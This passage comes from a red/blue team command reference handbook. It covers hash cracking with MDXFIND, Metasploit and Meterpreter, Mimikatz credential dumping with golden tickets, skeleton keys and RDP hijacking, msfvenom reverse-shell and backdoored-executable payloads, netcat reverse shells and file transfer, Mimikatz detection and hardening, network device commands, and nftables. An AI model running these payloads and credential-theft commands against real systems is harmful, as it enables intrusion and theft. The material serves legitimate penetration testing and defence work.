SHA1(MD5(MD5(MD5(MD5($pass)))))), you would set -q to 5.
-g Rotate calculated hashes to attempt match to input hash
-s File to read salts from
-u File to read Userid/Usernames from
-k File to read suffixes from
-n Number of digits to append to passwords. Other options,
like: -n 6x would append 6 digit hex values, and 8i would append
all ipv4 dotted- quad IP-addresses.
-i The number of iterations for each hash
-t The number of threads to run
-f file to read hashes from, else stdin
-l Append CR/LF/CRLF and print in hex
-r File to read rules from
-v Do not mark salts as found.
-w Number of lines to skip from first wordlist
-y Enable directory recursion for wordlists
-z Enable debugging information/hash results
-h The hash types: 459 TOTAL HASHES SUPPORTED

GENERIC ATTACK PLANS

This is a good general purpose MDXFIND command to run your hashes
against if you suspect them to be “non-standard” nested hashing
sequences. This command says “Run all hashes against [Link] using
10 iterations except ones having a salt, user, or md5x value in the
name.” It’s smart to skip salted/user hash types in MDXFIND unless
you are confident a salt value has been used.

cat [Link] | mdxfind -h ALL -h ‘!salt,!user,!md5x’ -i 10 [Link]

> [Link]

The developer of MDXFIND also recommends running the below command

options as a good general purpose attack:
cat [Link] | mdxfind -h ‘^md5$,^sha1$,^md5md5pass$,^md5sha1$’ -i
5 [Link] > [Link]

197
And you could add a rule attack as well:
cat [Link] | mdxfind -h ‘^md5$,^sha1$,^md5md5pass$,^md5sha1$’ -i
5 [Link] -r [Link] > [Link]

GENERAL NOTES ABOUT MDXFIND

-Can do multiple hash types/files all during a single attack run.
cat sha1/*.txt sha256/*.txt md5/*.txt salted/*.txt | mdxfind
-Supports 459 different hash types/sequences
-Can take input from special ‘stdin’ mode
-Supports VERY large hashlists (100mil) and 10kb character
passwords
-Supports using hashcat rule files to integrate with dictionary
-Option ‘-z’ outputs ALL viable hashing solutions and file can grow
very large
-Supports including/excluding hash types by using simple regex
parameters
-Supports multiple iterations (up to 4 billion times) by tweaking -
i parameter for instance:
MD5x01 is the same as md5($Pass)
MD5x02 is the same as md5(md5($pass))
MD5x03 is the same as md5(md5(md5($pass)))
...
MD5x10 is the same as
md5(md5(md5(md5(md5(md5(md5(md5(md5(md5($pass))))))))))
-Separate out -usernames -email -ids -salts to create custom
attacks
-If you are doing brute-force attacks, then hashcat is probably
better route
-When MDXfind finds any solution, it outputs the kind of solution
found, followed by the hash, followed by the salt and/or password.
For example:
Solution HASH:PASSWORD

MD5x01 000012273bc5cab48bf3852658b259ef:1EbOTBK3
MD5x05 033b111073e5f64ee59f0be9d6b8a561:08061999
MD5x09 aadb9d1b23729a3e403d7fc62d507df7:1140
MD5x09 326d921d591162eed302ee25a09450ca:1761974

MDSPLIT
When cracking large lists of hashes from multiple file locations,
MDSPLIT will help match which files the cracked hashes were found
in, while also outputing them into separate files based on hash
type. Additionally it will remove the found hashes from the
original hash file.

COMMAND STRUCTURE THREE METHODS 1-STDOUT 2-STDIN 3-File

1- Matching MDXFIND results files with their original hash_orig.txt

files.

198
cat hashes_out/out_results.txt | mdsplit hashes_orig/hash_orig.txt

OR perform matching against a directory of original hashes and

their results.
cat hashes_out/* | mdsplit hashes_orig/*

2- Piping MDXFIND directly into MDSPLIT to sort in real-time

results.
cat *.txt | mdxfind -h ALL -h ‘!salt,!user,!md5x’ -i 10 [Link] |
mdsplit *.txt

3- Specifying a file location in MDXFIND to match results in real-

time.
mdxfind -h ALL -f [Link] -i 10 [Link] | mdsplit [Link]

GENERAL NOTES ABOUT MDSPLIT

-MDSPLIT will append the final hash solution to the end of the new
filename. For example, if we submitted a ‘[Link]’ and the
solution to the hashes was “MD5x01” then the results file would be
‘hashes.MD5x01’. If multiple hash solutions are found then MDSPLIT
knows how to deal with this, and will then remove each of the
solutions from [Link], and place them into ‘hashes.MD5x01’,
‘hashes.MD5x02’, ‘hashes.SHA1’... and so on.

-MDSPLIT can handle sorting multiple hash files, types, and their
results all at one time. Any solutions will be automatically
removed from all of the source files by MDSPLIT, and tabulated into
the correct solved files. For example:
cat dir1/*.txt dir2/*.txt dir3/*.txt | mdxfind -h
‘^md5$,^sha1$,^sha256$’ -i 10 [Link] | mdsplit dir1/*.txt
dir2/*.txt dir3/*.txt

REFERENCE:
[Link]

M M
METASPLOIT
RED TEAM C2 WINDOWS/LINUX/MacOS
Metasploit is the world’s most used penetration testing framework.

GENERAL INFO
msfconsole Launch program
version Display current version
msfupdate Pull the weekly update
makerc <[Link]> Saves recent commands to file
msfconsole -r <[Link]> Loads a resource file

199
EXPLOIT/SCAN/MODULE
use <MODULE> Set the exploit to use
set payload <PAYLOAD> Set the payload
show options Show all options
set <OPTION> <SETTING> Set a setting
exploit or run Execute the exploit
SESSION HANDLING
sessions -l List all sessions
sessions -i <ID> Interact/attach to session
background or ^Z Detach from session
DATABASE
service postgresql Start Start DB
msfdb Init Init the DB
db_status Should say connected
hosts Show hosts in DB
services Show ports in DB
vulns Show all vulns found
METERPRETER SESSION CMDS
sysinfo Show system info
ps Show running processes
kill <PID> Terminate a process
getuid Show your user ID
upload / download Upload / download a file
Print working directory (local /
pwd / lpwd remote)
cd / lcd Change directory (local / remote)
cat Show contents of a file
edit <FILE> Edit a file (vim)
Drop into a shell on the target
shell machine
migrate <PID> Switch to another process
hashdump Show all pw hashes (Windows only)
idletime Display idle time of user
screenshot Take a screenshot
clearev Clear the logs
METERPRETER PRIV ESCALATION
use priv Load the script; Use privileges
getsystem Elevate your privs
getprivs Elevate your privs
METERPRETER TOKEN STEALING
use incognito Load the script
list_tokens -u Show all tokens
impersonate_token DOMAIN\USER Use token
drop_token Stop using token
METERPRETER NETWORK PIVOT
portfwd [ADD/DELETE] -L
<LHOST> -l 3388 -r <RHOST> -p
3389 Enable port forwarding
Pivot through a session by adding
route add <SUBNET> <MASK> a route within msf

200
 Pivot through a session by adding
route add [Link]/24 a route within msf
route add [Link]/24 -d Deleting a route within msf
SEARCH
EXPLOITS/PAYLOADS/MODULES
Searches all exploits, payloads,
search <TERM> and auxiliary modules
show exploits Show all exploits
show payloads Show all payloads
Show all auxiliary modules (like
show auxiliary scanners)
show all *
POPULAR MODULES/EXPLOITS
use
auxiliary/scanner/smb/smb_enu
mshares SMB Share Enumeration
use
auxiliary/scanner/smb/smb_ms1
7_010 MS17-010 SMB RCE Detection
use
exploit/windows/smb/ms17_010_ MS17-010 EternalBlue SMB Remote
eternalblue Windows Kernel Pool Corruption
MS17-010
use EternalRomance/EternalSynergy/Ete
exploit/windows/smb/ms17_010_ rnalChampion SMB Remote Windows
psexec Code Execution
use
exploit/windows/smb/ms08_067_ MS08-067 Microsoft Server Service
netapi Relative Path Stack Corruption
use Microsoft Windows Authenticated
exploit/windows/smb/psexec User Code Execution
SSH User Code Execution (good for
use exploit/multi/ssh/sshexec using meterpreter)
use
post/windows/gather/arp_scann
er Windows Gather ARP Scanner
use
post/windows/gather/enum_appl Windows Gather Installed
ications Application Enumeration
Enables RDP for Windows in
run getgui -e meterpreter session

REFERENCE:
[Link]
[Link]
[Link]
[Link]
and-reverse-tunneling-with-meterpreter-1e747e7fa901

201
M M
MIMIKATZ
RED TEAM ESCALATE PRIV WINDOWS
Mimikatz is a leading post-exploitation tool that dumps passwords
from memory, as well as hashes, PINs and Kerberos tickets.

QUICK USAGE
log
privilege::debug

SEKURLSA
sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrator /domain:winxp

/ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

KERBEROS
kerberos::list /export
kerberos::ptt c:\[Link]

kerberos::golden /admin:administrator /domain:[Link]

/sid:S-1-5-21-130452501-2365100805-3685010670
/krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:[Link]

CRYPTO
crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export
/systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

VAULT / LSADUMP
vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

202
lsadump::dcsync /user:domain\krbtgt /domain:[Link]

COMMAND DESCRIPTION
CRYPTO::Certificates list/export certificates
CRYPTO::Certificates list/export certificates
KERBEROS::Golden create golden/silver/trust tickets
list all user tickets (TGT and TGS) in
user memory. No special privileges
KERBEROS::List required since it only displays the
current user’s [Link] to
functionality of “klist”.
pass the ticket. Typically used to
KERBEROS::PTT inject a stolen or forged Kerberos
ticket (golden/silver/trust).
ask a DC to synchronize an object (get
LSADUMP::DCSync password data for account). No need to
run code on DC.
Ask LSA Server to retrieve SAM/AD
enterprise (normal, patch on the fly
or inject). Use to dump all Active
Directory domain credentials from a
LSADUMP::LSA
Domain Controller or [Link] dump
file. Also used to get specific
account credential such as krbtgt with
the parameter /name: “/name:krbtgt”
get the SysKey to decrypt SAM entries
(from registry or hive). The SAM
option connects to the local Security
LSADUMP::SAM Account Manager (SAM) database and
dumps credentials for local accounts.
This is used to dump all local
credentials on a Windows computer.
Ask LSA Server to retrieve Trust Auth
Information (normal or patch on the
LSADUMP::Trust
fly). Dumps trust keys (passwords) for
all associated trusts (domain/forest).
Add to SIDHistory to user account. The
first value is the target account and
MISC::AddSid the second value is the account/group
name(s) (or SID). Moved to SID:modify
as of May 6th, 2016.
Inject a malicious Windows SSP to log
MISC::MemSSP
locally authenticated credentials.
Inject Skeleton Key into LSASS process
on Domain Controller. This enables all
user authentication to the Skeleton
MISC::Skeleton
Key patched DC to use a “master
password” (aka Skeleton Keys) as well
as their usual password.

203
 get debug rights (this or Local System
PRIVILEGE::Debug rights is required for many Mimikatz
commands).
SEKURLSA::Ekeys list Kerberos encryption keys
List Kerberos credentials for all
SEKURLSA::Kerberos authenticated users (including
services and computer account)
get Domain Kerberos service account
SEKURLSA::Krbtgt
(KRBTGT)password data
lists all available provider
credentials. This usually shows
SEKURLSA::LogonPasswords
recently logged on user and computer
credentials.
SEKURLSA::Pth Pass- theHash and Over-Pass-the-Hash
Lists all available Kerberos tickets
for all recently authenticated users,
including services running under the
context of a user account and the
local computer’s AD computer account.
SEKURLSA::Tickets
Unlike kerberos::list, sekurlsa uses
memory reading and is not subject to
key export restrictions. sekurlsa can
access tickets of others sessions
(users).
TOKEN::List list all tokens of the system
impersonate a token. Used to elevate
TOKEN::Elevate permissions to SYSTEM (default) or
find a domain admin token on the box
TOKEN::Elevate impersonate a token with Domain Admin
/domainadmin credentials.

Mimikatz - Execute commands

SINGLE COMMAND
PS C:\temp\mimikatz> .\mimikatz "privilege::debug"
"sekurlsa::logonpasswords" exit

MULTIPLE COMMANDS (Mimikatz console)

PS C:\temp\mimikatz> .\mimikatz
mimikatz # privilege::debug
mimikatz # sekurlsa::logonpasswords
mimikatz # sekurlsa::wdigest

Mimikatz - Extract passwords

**Microsoft disabled lsass clear text storage since Win8.1 /
2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 /
2008R2 / 2012 but clear text is still enabled.

mimikatz_command -f sekurlsa::logonPasswords full

mimikatz_command -f sekurlsa::wdigest

204
# to re-enable wdigest in Windows Server 2012+
# in
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProvide
rs\WDigest
# create a DWORD 'UseLogonCredential' with the value 1.
reg add
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v
UseLogonCredential /t REG_DWORD /f /d 1

!!!!To take effect, conditions are required:

Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2:
Adding requires lock
Removing requires signout
Win10:
Adding requires signout
Removing requires signout
Win2016:
Adding requires lock
Removing requires reboot
Mimikatz - Pass-The-Hash
sekurlsa::pth /user:<USER> /domain:<DOMAINFQDN>
/aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c9409
8a9e9
sekurlsa::pth /user:<USER> /domain:<DOMAINFQDN>
/ntlm:cc36cf7a8514893efccd332446158b1a
/aes256:b7268361386090314acce8d9367e55f55865e7ef8e670fbe4262d6c9409
8a9e9

Mimikatz - Mini Dump

Dump the lsass process.
# HTTP method
certutil -urlcache -split -f
[Link]
C:\Users\Public\[Link]
C:\Users\Public\[Link] -accepteula -ma [Link] [Link]

# SMB method
net use Z: [Link]
Z:\[Link] -accepteula -ma [Link] [Link]

Then load it inside Mimikatz.

mimikatz # sekurlsa::minidump [Link]
Switch to minidump
mimikatz # sekurlsa::logonPasswords

Mimikatz - Golden ticket

205
.\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME
/domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID
/krbtgt:KRBTGTPASSWORDHASH /ptt
Example
.\mimikatz "kerberos::golden /admin:ADMINACCOUNTNAME
/domain:DOMAINFQDN /id:9999 /sid:S-1-5-21-135380161-102191138-
581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0
/endin:600 /renewmax:10080 /ptt" exit

Mimikatz - Skeleton key

privilege::debug
misc::skeleton
# map the share
net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
# login as someone
rdesktop [Link]:3389 -u test -p mimikatz -d pentestlab

Mimikatz - RDP session takeover

Run [Link] as the SYSTEM user, you can connect to any session
without a password.
privilege::debug
token::elevate
ts::remote /id:2

# get the Session ID you want to hijack

query user
create sesshijack binpath= "[Link] /k tscon 1 /dest:rdp-tcp#55"
net start sesshijack

Mimikatz - Credential Manager & DPAPI

# check the folder to find credentials
dir C:\Users\<username>\AppData\Local\Microsoft\Credentials\*

# check the file with mimikatz

$ mimikatz dpapi::cred
/in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629
F5AA74CD934ECD2F88D64ECD0

# find master key

$ mimikatz !sekurlsa::dpapi

# use master key

$ mimikatz dpapi::cred
/in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629
F5AA74CD934ECD2F88D64ECD0
/masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed50630432739
40f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b
6a17b

206
REFERENCE:
[Link]
[Link]
%20and%20Resources/Windows%
[Link]
[Link]

M M
MIMIKATZ_Defend
BLUE TEAM CONFIGURATION/HUNT WINDOWS
Methods to defend against and detect mimikatz usage

MIMIKATZ DEFENSE
Disable Debug Permissions
Allow only a certain group to have debug permissions:
Group Policy Management Editor -> Windows Settings -> Security
Settings -> Local Policies -> User Rights Assignment -> Debug
programs -> Define these policy settings:

Disable WDigest Protocol

Don’t allow plaintext passwords in LSASS
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProvide
rs\WDigest
UseLogonCredential DWORD 0

Enable LSA Protection

Create registry key RunAsPPL under:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA
RunAsPPL DWORD 1

Restricted Admin Mode

Create registry key DisableRestrictedAdmin
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
DWORD 0
Create registry key DisableRestrictedAdminOutboundCreds
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
DWORD 1
Ensure "Restrict delegation of credentials to remote servers"
policy is enforced across the domain. "Require Restricted Admin"

Change Credential Caching to 0

Change the configuration settings to zero to disallow credential
caching:

207
Computer Configuration -> Windows Settings -> Local Policy ->
Security Options -> Interactive Logon: Number of previous logons to
cache -> 0

Enable Protected Users Group

Group enables domain administrators to protect privilege users like
Local Administrators. Accounts can be added into the “Protected
Users” group from PowerShell by executing the following command:
Add-ADGroupMember –Identity 'Protected Users' –Members Alice

DETECT MIMIKATZ
Sysmon Event 10 (Process Accessed)
Splunk query similar to this:
EventCode=10 | where (GrantedAccess="0x1010" AND TargetImage LIKE
"%[Link]")

Windows Event 4656

Splunk query similar to this:
EventCode=4656 OR EventCode=4663 | eval
HandleReq=case(EventCode=4656 AND Object_Name LIKE "%[Link]" AND
Access_Mask=="0x143A", Process_ID) | where (HandleReq=Process_ID)
or
EventCode=4656 | where (Object_Name LIKE "%[Link]" AND
Access_Mask=="0x143A")

Sysmon Event 1 (ProcessCreate) & Event 10 (ProcessAccessed)

Elaborate a correlation rule
SEQUENCE:
1. EventCode=1 | where (match(ParentImage, "[Link]") AND
match(IntegrityLevel, "high"))
2. EventCode=10 | where (match(GrantedAccess, "0x1010")
AND !match(SourceImage, "svchost\.exe") AND match(TargetImage,
"lsass\.exe"))

REFERENCE:
[Link]
[Link]

M M
MSFVENOM
RED TEAM PAYLOADS WINDOWS/LINUX/MacOS
MsfVenom is a Metasploit standalone payload generator as a
replacement for msfpayload and msfencode.

BINARIES

208
 Creates a simple
msfvenom -p windows/meterpreter/reverse_tcp TCP Payload for
LHOST={IP} LPORT={##} -f exe > [Link] Windows
Creates a simple
msfvenom -p windows/meterpreter/reverse_http HTTP Payload for
LHOST={IP} LPORT={##} -f exe > [Link] Windows
msfvenom -p Creates a simple
linux/x86/meterpreter/reverse_tcp LHOST={IP} TCP Shell for
LPORT={##} -f elf > [Link] Linux
msfvenom -p osx/x86/shell_reverse_tcp
LHOST={IP} LPORT={##} -f macho > Creates a simple
[Link] TCP Shell for Mac
Creats a simple
msfvenom -p android/meterpreter/reverse/tcp TCP Payload for
LHOST={IP} LPORT={##} R > [Link] Android
WEB PAYLOAD
msfvenom -p php/meterpreter_reverse_tcp Creats a Simple
LHOST={IP} LPORT={##} -f raw > [Link] TCP Shell for PHP
msfvenom -p windows/meterpreter/reverse_tcp Creats a Simple
LHOST={IP} LPORT={##} -f asp > [Link] TCP Shell for ASP
Creats a Simple
msfvenom -p java/jsp_shell_reverse_tcp TCP Shell for
LHOST={IP} LPORT={##} -f raw > [Link] Javascript
msfvenom -p java/jsp_shell_reverse_tcp Creats a Simple
LHOST={IP} LPORT={##} -f war > [Link] TCP Shell for WAR
WINDOWS PAYLOAD
Lists all
msfvenom -l encoders avalaible encoders
msfvenom -x [Link] -k -p Binds an exe with
windows/meterpreter/reverse_tcp LHOST={IP} a Payload
LPORT={##} -f exe > [Link] (Backdoors an exe)
Creates a simple
msfvenom -p windows/meterpreter/reverse_tcp TCP payload with
LHOST={IP} LPORT={##} -e x86/shikata_ga_nai shikata_ga_nai
-b ‘\x00’ -i 3 -f exe > [Link] encoder
msfvenom -x [Link] -k -p
windows/meterpreter/reverse_tcp LHOST={IP} Binds an exe with
LPORT={##} -e x86/shikata_ga_nai -i 3 -b a Payload and
“\x00” -f exe > [Link] encodes it
MACOS PAYLOAD
msfvenom -a x86 --platform OSX -p
osx/x86/isight/bind_tcp -b "\x00" -f elf -o
/tmp/osxt2
msfvenom -p python/meterpreter/reverse_tcp Creates a Python
LHOST=[Link] LPORT=443 > [Link] Shell for Mac
msfvenom -p osx/x86/shell_reverse_tcp
LHOST={IP} LPORT={##} -f macho > Creates a simple
[Link] TCP Shell for Mac

REFERENCE:

209
[Link]

N
N N
NETCAT
RED/BLUE TEAM ADMINISTRATION WINDOWS/LINUX/MacOS
netcat is a command-line or shell application that can be used for
a variety of uses including transferring files, establishing remote
shells, chat, and more!

Port Scan
nc -nvz <IP> <PORT/RANGE>
nc -nvz [Link] 80
nc -nvz [Link] 0-1000

Send File
#Client
nc -lvp <LPORT> > example_sent.txt
#Server
nc -w3 <CLIENT_IP> <PORT> < [Link]

Receive File
#Server
nc -lvp <LPORT> < [Link]
#Client
nc -w3 <SERVER_IP> <PORT> > example_exfil.txt

Execute Remote Script

210
#Server
nc -lvp <LPORT> -e [Link] <IP>
#Client
nc -nv <SERVER_IP> <PORT>

Encrypted Chat (NCAT)

#Server
ncat -nlvp <LPORT> --ssl
#Client
ncat -nv <SERVER_IP> <PORT>

Banner Grab
nc <TARGET_IP> <PORT>
nc [Link] 80
HEAD / HTTP/1.0
Host: [Link]

Shells/Reverse Shells
nc -e /bin/sh [Link] <LPORT>
nc -e /bin/bash [Link] <LPORT>
nc -c bash [Link] <LPORT>

N N
NETWORK DEVICE_Commands
RED/BLUE TEAM NETWORK DEVICES 4 MODELS

CISCO JUNIPER NOKIA HUAWEI

IOS XR JUNOS SROS HVRP
BASIC
show show show display
exit exit/up exit all quit
run run – –
end exit exit all return
| include | match | match | include
… formal | | display-set – –
request system admin reboot
reload reboot now reboot
GENERAL CONFIG
display
show running- show admin display- current-
config configuration config configuration
display
show startup- saved-
config – – configuration

211
configure configure /
terminal edit configure system view
system
hostname system host- name systemnam sysname syst
hostname name hostname e emname
show (after info (after
conf change) show | compare conf change) –
commit commit admin save save
shut down disable shut down shut down
delete
interfaces x undo shut
no shut down disable no shutdown down
no delete no undo
SHOW
show system show system
show clock uptime time display clock
display ntp-
service
show ntp status show ntp status show system ntp status
display
show cli history-
show history history history command
display
show chassis show device pic-
show platform fpc card, show mda status
show card
admin show show chassis detail, show display
platform fpc detail mda detail device
show show chassis
environment environment – –
show chassis
show inventory hardware – –
show
admin show show chassis chassis enviro
environment | hardware | nment power-
include PM match PSM supply display power
show chassis show chassis
show diags hardware environment –
show memory show chassis show system display
summary routing engine memory-pools memory-usage
show system
show processes processes display cpu-
cpu extensive show system cpu usage
show system show system
show users users users display users
display
show version show version show version version
display
show license – – license

212
 show system show system display alarm
– alarms alarms all / active
show chassis
– alarms – –
display arp
show arp show arp show router arp all
show router display ip
show interface show interfaces interface interface
display ip
show interface show interfaces interface
interface interface show port port interface
show interface
interface show port port
statistics statistics
show router display ip
show interface show interface interface interface
brief terse summary brief
show class-of-
service show router
show policy-map interface policy –
show policy-map show interfaces
interface queue – –
show router display ip
show route show route route-table routing-table
show router
show route show route route-table
summary summary summary –
show router
show route route-table display ipv6
show route ipv6 table inet6.0 ipv6 routing-table
show router display
show route-map show policy policy route-policy
show snmp show snmp display snmp
show snmp statistics counters statistics
show system show system display tcp
show tcp connections connections statistics
show ipv4 show system display ip
traffic statistics – statistics
show route
show protocols protocol – –
file ( +
show flash show flash dir ) dir flash:
show system
show filesystem storage – dir
show bfd show bfd show router bfd display bfd
session session session session all
show bfd
interfaces show router bfd display bfd
location x – interface interface

213
 display
show interfaces show interfaces interface
be x aex show lag x Eth-Trunk x
show interfaces show interfaces show lag x
be x details aex details detail –
show lag x
– – associations –
TROUBLESHOOT
ping ip_addres ping ip_addres ping ip_addr
ping ip_address s s ess
traceroute ip_ traceroute ip_ traceroute ip_ tracert ip_a
address address address ddress
debug debug debug debugging
undo
no debug undebug all no debug debugging
monitor monitor
interface interface monitor port
interface interface port –
terminal
monitor
terminal monitor start /terminal
monitor messages – trapping
terminal monitor stop undo termina
monitor disable messages – l monitor
display
show tech- request support admin tech- diagnostic-
support info support information
show log show log log-id display
show logging messages 99 (all) logbuffer
show interfaces
show diagnostic
controllers optics display
interface interface – controller
show access- show filter ip
lists show firewall x display acl x
CLEAR
clear clear clear reset
clear interface reset
clear counters statistics clear counter counters
interface interface interface xx interface xx
clear router
clear arp-cache clear arp arp reset arp
reset ip
fast-
clear cef – – forwarding
reset ip
forwarding-
table
clear router statistis
clear route * clear ip route route-adv protocol all

214
clear access-
list counters clear firewall clear filter –
request system
clear line line logout username – –
OSPF
show ospf show ospf show router display ospf
(summary) overview ospf status brief
show ospf show ospf show router display ospf
database database ospf database lsdb
show ospf show ospf show router display ospf
interface interface ospf interface interface
show ospf show ospf show router display ospf
neighbor neighbor ospf neighbor nexthop
display ip
show route show router routing-table
show route ospf protocol ospf ospf routes protocol ospf
show router
show ospf ospf virtual- display ospf
virtual-links – link vlink
show ospf show ospf show router display ospf
statistics statistics ospf statistics statistics
ISIS
display isis show isis show router display isis
interface interface isis interface interface
show clns show isis show router display isis
neighbor adjacency isis adjaceny peer
show isis show isis show router display isis
database database isis database lsdb
show isis show show router
topology isis topology isis topology –
show isis show router display isis
routes show isis route isis routes route
show isis spf- show isis spf show router display isis
log log isis spf-log spf-log
show isis show isis show router display isis
statistics statistics isis statistics statistics
clear clns clear isis clear router
neighbors adjacency isis adjacency –
clear isis clear router
clear isis * database isis database –
clear isis clear isis clear router
statistics statistics isis statistics –
BGP
show route show router bgp display bgp
show bgp protocol bgp routes routing-table
show bgp show route
community community – –
show bgp show bgp show router bgp display bgp
neighbors neighbor neighbor peer

215
show bgp peer- show router bgp display bgp
group show bgp group group group
show bgp show bgp show router bgp display bgp
summary summary summary peer
display ip
show route show router bgp routing-table
show route bgp protocol bgp routes protocol bgp
clear bgp
clear bgp neighbor clear bgp reset bgp all
clear bgp
nexthop clear bgp clear bgp next-
registration neighbor hop –
MPLS
show mpls show mpls show router display mpls
interface interface mpls interfaces interface
show mpls ldp show ldp show mpls ldp display mpls
summary overview summary ldp all
show mpls ldp show mpls ldp show router ldp display mpls
interface interface interface ldp interface
show mpls ldp show router ldp
bindings – bindings –
show mpls ldp show ldp show router ldp display mpls
neighbor brief neighbor session ldp adjacency
display mpls
show rsvp show rsvp show router rsvp-te
interface interface rsvp interface interface
show rsvp show rsvp show router display mpls
neighbors neighbor rsvp neighbors rsvp-te peer
display mpls
show rsvp show rsvp show router rsvp-te
session session rsvp session session x
display mpls
rsvp-te
show rsvp show rsvp show router statistics
counters statistics rsvp statistics global
MULTICAST
display
show mfib/mrib show multicast show mfib/mrib multicast
route route route routing-table
display
multicast
show multicast flow-
– statistics – statistic
show pim show pim show router pim display pim
interface interfaces interfaces interface
show pim show pim show router display pim
neighbor interfaces pim neighbor neighbor
show pim group- show router pim
map show pim group group –

216
 show ip pim rp show router pim display pim
mapping show pim rps rp rp-info
show pim show pim show router pim
traffic statistics statistics –
display
multicast
show mroute show mfib – routing-table
show igmp show igmp show router display igmp
interface interface igmp interface interface
show igmp show router
groups show igmp group igmp group –
show router
show igmp show igmp igmp statistic
traffic statistics s –
show mld show mld show router mld display igmp
interface interface interface interface
show router mld display igmp
show mld groups show mld group group group
show mld show mld show router mld
traffic statistics statistics –
VRRP
show vrrp show vrrp show router display vrrp
interface interface vrrp instance interface
interface interface interface interface
show vrrp display vrrp
status show vrrp brief – brief
show vrrp show vrrp
summary summary – –
show vrrp show vrrp display vrrp
statistics – statistics statistics

REFERENCE:
[Link]
[Link]

N N
NFTABLES
RED/BLUE TEAM FIREWALL LINUX
nftables (netfilter tables) is the successor to iptables. It
replaces the existing iptables, ip6tables, arptables and ebtables
framework.

TABLES
ip Used for IPv4 related chains
ip6 Used for IPv6 related chains
arp Used for ARP related chains
bridge Used for bridging related chains
inet Mixed ipv4/ipv6 chains

217
CHAINS
filter for filtering packets
route for rerouting packets
nat for performing Network Address Translation
HOOKS
This is before the routing decision, all packets
prerouting entering the machine hits this chain
input All packets for the local system hits this hook
Packets not for the local system, those that need
forward to be forwarded hits this hook
Packets that originate from the local system pass
output this hook
This hook is after the routing decision, all
postrouting packets leaving the machine hits this chain
RULES
ip IP protocol
ip6 IPv6 protocol
tcp TCP protocol
udp UDP protocol
udplite UDP-lite protocol
sctp SCTP protocol
dccp DCCP protocol
ah Authentication headers
esp Encrypted security payload headers
ipcomp IPcomp headers
icmp icmp protocol
icmpv6 icmpv6 protocol
ct Connection tracking
meta Meta properties such as interfaces
MATCHES
MATCH DESCRIPTION
ip
version Ip Header version
hdrlength IP header length
tos Type of Service
length Total packet length
id IP ID
frag-off Fragmentation offset
ttl Time to live
protocol Upper layer protocol
checksum IP header checksum
saddr Source address
daddr Destination address
ip6
version IP header version
priority
flowlabel Flow label
length Payload length
nexthdr Next header type (Upper layer protocol number)
hoplimit Hop limit

218
saddr Source Address
daddr Destination Address
tcp
sport Source port
dport Destination port
sequence Sequence number
ackseq Acknowledgement number
doff Data offset
flags TCP flags
window Window
checksum Checksum
urgptr Urgent pointer
udp
sport Source port
dport destination port
length Total packet length
checksum Checksum
udplite
sport Source port
dport destination port
cscov Checksum coverage
checksum Checksum
sctp
sport Source port
dport destination port
vtag Verification tag
checksum Checksum
dccp
sport Source port
dport Destination port
ah
nexthdr Next header protocol (Upper layer protocol)
hdrlength AH header length
spi Security Parameter Index
sequence Sequence Number
esp
spi Security Parameter Index
sequence Sequence Number
ipcomp
nexthdr Next header protocol (Upper layer protocol)
flags Flags
cfi Compression Parameter Index
icmp
type icmp packet type
icmpv6
type icmpv6 packet type
ct
state State of the connection
direction Direction of the packet relative to the connection
status Status of the connection

219
 mark Connection mark
expiration Connection expiration time
helper Helper associated with the connection
l3proto Layer 3 protocol of the connection
Source address of the connection for the given
saddr direction
Destination address of the connection for the given
daddr direction
Layer 4 protocol of the connection for the given
protocol direction
proto-src Layer 4 protocol source for the given direction
Layer 4 protocol destination for the given
proto-dst direction
meta
length Length of the packet in bytes: meta length > 1000
protocol ethertype protocol: meta protocol vlan
priority TC packet priority
mark Packet mark
iif Input interface index
iifname Input interface name
iiftype Input interface type
oif Output interface index
oifname Output interface name
oiftype Output interface hardware type
skuid UID associated with originating socket
skgid GID associated with originating socket
rtclassid Routing realm
STATEMENTS
accept Accept the packet and stop the ruleset evaluation
drop Drop the packet and stop the ruleset evaluation
reject Reject the packet with an icmp message
Queue the packet to userspace and stop the ruleset
queue evaluation
continue
Return from the current chain and continue at the
next rule of the last chain. In a base chain it is
return equivalent to accept
Continue at the first rule of <chain>. It will
jump continue at the next rule after a return statement
<chain> is issued
after the new chain the evaluation will continue at
goto the last chain instead of the one containing the
<chain> goto statement

Initial setup iptables like chain setup, use ipv4-filter file

provided in the source:
nft -f files/nftables/ipv4-filter

220
List the resulting chain:
nft list table filter
**Note that filter as well as output or input are used as chain and
table name. Any other string could have been used.

BASIC RULES HANDLING

Drop output to a destination:
nft add rule ip filter output ip daddr [Link] drop

Rule counters are optional with nftables. Counter keyword need to

be used to activate it:
nft add rule ip filter output ip daddr [Link] counter drop

Add a rule to a network:

nft add rule ip filter output ip daddr [Link]/24 counter

Drop packet to port 80:

nft add rule ip filter input tcp dport 80 drop

Accept ICMP echo request:

nft add rule filter input icmp type echo-request accept

Combine filtering specify multiple time the ip syntax:

nft add rule ip filter output ip protocol icmp ip daddr [Link]
counter drop

Delete all rules in a chain:

nft delete rule filter output

Delete a specific rule use the -a flag on nft get handle number:
# nft list table filter -a
